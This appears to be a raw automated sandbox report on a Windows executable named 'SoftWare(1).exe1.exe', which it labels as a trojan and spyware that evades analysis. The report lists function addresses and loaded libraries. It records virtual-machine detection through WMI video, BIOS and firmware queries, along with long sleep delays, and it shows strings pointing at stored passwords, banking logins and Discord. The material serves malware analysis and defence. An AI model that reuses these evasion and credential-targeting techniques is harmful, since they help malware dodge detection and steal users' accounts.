Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00321370	1_2_00321370
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00320350	1_2_00320350
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00308340	1_2_00308340
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0032EB40	1_2_0032EB40
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0031ABA0	1_2_0031ABA0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00306390	1_2_00306390
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00313390	1_2_00313390
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_003173F0	1_2_003173F0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0031F3D0	1_2_0031F3D0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00305C20	1_2_00305C20
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00341420	1_2_00341420
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0033B41A	1_2_0033B41A
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00333477	1_2_00333477
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00325C60	1_2_00325C60
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00328450	1_2_00328450
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00302C40	1_2_00302C40
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0031EC40	1_2_0031EC40
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00328C40	1_2_00328C40
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_003054A0	1_2_003054A0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00310490	1_2_00310490
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00333C90	1_2_00333C90
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00306C80	1_2_00306C80
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00316480	1_2_00316480
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00325480	1_2_00325480
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00332480	1_2_00332480
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0031CCE0	1_2_0031CCE0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0030E4C0	1_2_0030E4C0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00313CC0	1_2_00313CC0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00307D30	1_2_00307D30
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0030F530	1_2_0030F530
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0030AD30	1_2_0030AD30
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00339536	1_2_00339536
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00319500	1_2_00319500
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0031D560	1_2_0031D560
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0031DD50	1_2_0031DD50
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0032FD50	1_2_0032FD50
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00318540	1_2_00318540
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_003155B0	1_2_003155B0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0032EDB0	1_2_0032EDB0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00309580	1_2_00309580
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0032DD80	1_2_0032DD80
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0032F5D0	1_2_0032F5D0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_003335C0	1_2_003335C0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0031B630	1_2_0031B630
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00329630	1_2_00329630
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00317620	1_2_00317620
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00310E20	1_2_00310E20
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00330620	1_2_00330620
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00304660	1_2_00304660
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00317E50	1_2_00317E50
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00308640	1_2_00308640
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00303640	1_2_00303640
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00316E40	1_2_00316E40
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0031C6A0	1_2_0031C6A0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00312E90	1_2_00312E90
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00328690	1_2_00328690
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00332E90	1_2_00332E90
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0032B680	1_2_0032B680
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_003126F0	1_2_003126F0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00331EF0	1_2_00331EF0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0030E730	1_2_0030E730
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00319720	1_2_00319720
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00329F00	1_2_00329F00
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0031FF70	1_2_0031FF70
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00301790	1_2_00301790
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00316790	1_2_00316790
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0030B780	1_2_0030B780
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00320F80	1_2_00320F80
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0034E782	1_2_0034E782
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00309FF0	1_2_00309FF0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_003067D0	1_2_003067D0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0041C833	1_2_0041C833
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_004380C8	1_2_004380C8
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_004110F9	1_2_004110F9
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00421890	1_2_00421890
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_004378B8	1_2_004378B8
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0040BA50	1_2_0040BA50
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00412AF8	1_2_00412AF8
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00444300	1_2_00444300
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_004283A0	1_2_004283A0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0042CBA0	1_2_0042CBA0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0044C3A0	1_2_0044C3A0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0041BCC0	1_2_0041BCC0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00447DF0	1_2_00447DF0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0042FE40	1_2_0042FE40
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0044CE10	1_2_0044CE10
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00415EF9	1_2_00415EF9
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0040EFAE	1_2_0040EFAE
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00401040	1_2_00401040
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0041F065	1_2_0041F065
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00417870	1_2_00417870
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00427830	1_2_00427830
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00445830	1_2_00445830
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00449832	1_2_00449832
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00402140	1_2_00402140
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0040D940	1_2_0040D940
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00426150	1_2_00426150
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00451150	1_2_00451150
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00439160	1_2_00439160
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00442168	1_2_00442168
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0040B970	1_2_0040B970
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00451170	1_2_00451170
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00424900	1_2_00424900
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0042D92B	1_2_0042D92B
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0045113C	1_2_0045113C
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0040F9C0	1_2_0040F9C0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_004139D0	1_2_004139D0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0043B9F9	1_2_0043B9F9
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00412185	1_2_00412185
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00445250	1_2_00445250
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00429A70	1_2_00429A70
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0042020C	1_2_0042020C
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00426A15	1_2_00426A15
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0041E21B	1_2_0041E21B
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_004292C0	1_2_004292C0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0044CAE0	1_2_0044CAE0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00408A80	1_2_00408A80
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0044B280	1_2_0044B280
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00431290	1_2_00431290
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00445AA0	1_2_00445AA0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_004512AC	1_2_004512AC
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_004252B0	1_2_004252B0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00402B50	1_2_00402B50
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0041C833	1_2_0041C833
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0040A320	1_2_0040A320
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0040C320	1_2_0040C320
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00416B81	1_2_00416B81
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0044B380	1_2_0044B380
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00411C5F	1_2_00411C5F
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0042D460	1_2_0042D460
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00432407	1_2_00432407
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0043F410	1_2_0043F410
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0042F430	1_2_0042F430
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0043DC31	1_2_0043DC31
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_004384C3	1_2_004384C3
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0040D4D0	1_2_0040D4D0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_004434DF	1_2_004434DF
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0041DCDF	1_2_0041DCDF
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0044B4F0	1_2_0044B4F0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00410483	1_2_00410483
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0042F489	1_2_0042F489
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00424C90	1_2_00424C90
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0044BCB6	1_2_0044BCB6
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00409540	1_2_00409540
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00443540	1_2_00443540
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0043155F	1_2_0043155F
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00403560	1_2_00403560
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00425560	1_2_00425560
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00413D09	1_2_00413D09
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0040AD20	1_2_0040AD20
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0043B536	1_2_0043B536
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0041EDDC	1_2_0041EDDC
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0044B580	1_2_0044B580
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00420D90	1_2_00420D90
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00407DA0	1_2_00407DA0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_004305B2	1_2_004305B2
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00433640	1_2_00433640
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00448650	1_2_00448650
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0043C610	1_2_0043C610
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0044B61F	1_2_0044B61F
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00437627	1_2_00437627
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0040CE30	1_2_0040CE30
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0040E6D0	1_2_0040E6D0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00444ED0	1_2_00444ED0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00445ED1	1_2_00445ED1
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_004326E0	1_2_004326E0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_004386EC	1_2_004386EC
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00430E93	1_2_00430E93
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00410EAB	1_2_00410EAB
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00403F00	1_2_00403F00
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0043E703	1_2_0043E703
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0041AF00	1_2_0041AF00
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0040C710	1_2_0040C710
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00436729	1_2_00436729
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0042D730	1_2_0042D730
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00408FC0	1_2_00408FC0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0044C7D0	1_2_0044C7D0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_004047E2	1_2_004047E2
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_004437A0	1_2_004437A0

Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: String function: 0041AEF0 appears 102 times
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: String function: 00336F60 appears 102 times
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: String function: 00344014 appears 34 times
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: String function: 0040B350 appears 52 times
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: String function: 0033F1CC appears 46 times

Source: SoftWare(1).exe1.exe

Static PE information: invalid certificate

Source: SoftWare(1).exe1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: SoftWare(1).exe1.exe

Static PE information: Section: .bss ZLIB complexity 1.0003231990014265

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/0@1/1

Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe

Code function: 1_2_00444300 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

1_2_00444300

Source: SoftWare(1).exe1.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SoftWare(1).exe1.exe, 00000001.00000003.1498818033.00000000032C3000.00000004.00000800.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1467279104.00000000032B4000.00000004.00000800.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1466788883.00000000032F8000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe

File read: C:\Users\user\Desktop\SoftWare(1).exe1.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SoftWare(1).exe1.exe "C:\Users\user\Desktop\SoftWare(1).exe1.exe"
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Process created: C:\Users\user\Desktop\SoftWare(1).exe1.exe "C:\Users\user\Desktop\SoftWare(1).exe1.exe"
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Process created: C:\Users\user\Desktop\SoftWare(1).exe1.exe "C:\Users\user\Desktop\SoftWare(1).exe1.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: SoftWare(1).exe1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_0033711A push ecx; ret	0_2_0033712D
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_003B8FF1 push es; iretd	0_2_003B8FF2
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0033711A push ecx; ret	1_2_0033712D
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_003B8FF1 push es; iretd	1_2_003B8FF2
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_004513DA push edx; retf	1_2_004513FE
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_004554C9 push 00000000h; iretd	1_2_00455520
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00451648 pushad ; retf	1_2_00451689
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00455676 push 00000000h; iretd	1_2_004556EC
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00455766 push 00000000h; ret	1_2_00455770
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_004517FC push ebx; ret	1_2_00451803

Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe

API coverage: 9.6 %

Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe TID: 3256	Thread sleep time: -150000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe TID: 3148	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00348ECE FindFirstFileExW,	0_2_00348ECE
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00348F7F FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00348F7F
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00348ECE FindFirstFileExW,	1_2_00348ECE
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00348F7F FindFirstFileExW,FindNextFileW,FindClose,FindClose,	1_2_00348F7F

Source: SoftWare(1).exe1.exe, 00000001.00000003.1499670362.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: SoftWare(1).exe1.exe, 00000001.00000003.1499670362.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: SoftWare(1).exe1.exe, 00000001.00000003.1499670362.00000000032DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
